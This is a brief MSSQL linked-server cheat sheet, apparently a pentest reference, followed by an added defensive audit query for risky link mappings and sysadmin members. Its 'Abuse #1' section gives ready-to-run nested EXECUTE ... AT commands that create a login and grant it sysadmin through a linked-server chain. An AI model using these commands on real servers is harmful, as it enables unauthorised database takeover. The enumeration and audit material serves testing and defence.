Basic Commands
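Hint: In MSSQL, escape a single quote inside a string literal by doubling it (''). Each additional level of nested EXECUTE doubles the quotes again.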
# Show current server
select @@servername
# Show linked servers
select srvname from sysservers;
# Show linked servers (built-in command of the impacket mssqlclient.py shell)
enum_links
Execute Query between Linked Servers
# Execute query from current server to linked server
EXECUTE ('select @@version;') at [<LINKED_SERVER>];
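# Execute query on the current server through the linked server (current -> linked -> current); lists the server-level permissions held when coming back over the link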
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [<CURRENT_SERVER>]') at [<LINKED_SERVER>];
Abuse #1: Create Admin User from Privileged Linked Server
EXECUTE('EXECUTE(''CREATE LOGIN <USER> WITH PASSWORD = ''''<PASSWORD>'''';'') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''<USER>'''', ''''sysadmin'''''') AT [<CURRENT_SERVER>]') AT [<LINKED_SERVER>]
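Audit for the chain above, as an added example that is not part of the original page: the first query flags linked servers whose RPC Out setting and fixed remote login mapping allow nested EXECUTE ... AT, and the second lists sysadmin members, newest first, to spot a login created this way. It assumes the query is run by a login allowed to view server-level metadata (for example a sysadmin); the finding labels are constructed for this example.

```sql
-- Added audit example; the 'finding' labels are constructed for illustration.
-- 1) Linked servers and the login mappings that make EXECUTE ... AT chains possible.
SELECT
    s.name                    AS linked_server,
    s.data_source,
    s.is_rpc_out_enabled,     -- 1 = EXECUTE (...) AT [server] is allowed
    s.is_data_access_enabled, -- 1 = OPENQUERY / four-part names are allowed
    CASE WHEN ll.local_principal_id = 0 THEN '<all logins (default mapping)>'
         ELSE p.name END      AS local_login,
    ll.uses_self_credential,  -- 1 = caller's own credentials are passed through
    ll.remote_name,           -- fixed remote login used when uses_self_credential = 0
    CASE
        WHEN ll.server_id IS NULL
            THEN 'INFO: no login mapping defined'
        WHEN ll.uses_self_credential = 0 AND ll.local_principal_id = 0
             AND s.is_rpc_out_enabled = 1
            THEN 'HIGH: any local login can execute remotely as a fixed remote login'
        WHEN ll.uses_self_credential = 0 AND s.is_rpc_out_enabled = 1
            THEN 'REVIEW: mapped login can execute remotely as a fixed remote login'
        WHEN ll.uses_self_credential = 0
            THEN 'REVIEW: fixed remote login, RPC Out disabled'
        ELSE 'OK: caller credentials are passed through'
    END                       AS finding,
    s.modify_date             AS server_modified,
    ll.modify_date            AS mapping_modified
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p  ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 2) Current sysadmin members, newest first (a login added through a link shows up here).
SELECT
    m.name        AS member,
    m.type_desc,
    m.create_date,
    m.modify_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.create_date DESC;
```

Run both queries on every server in the link chain, since the remote login's privileges are decided on the server at the far end of each link.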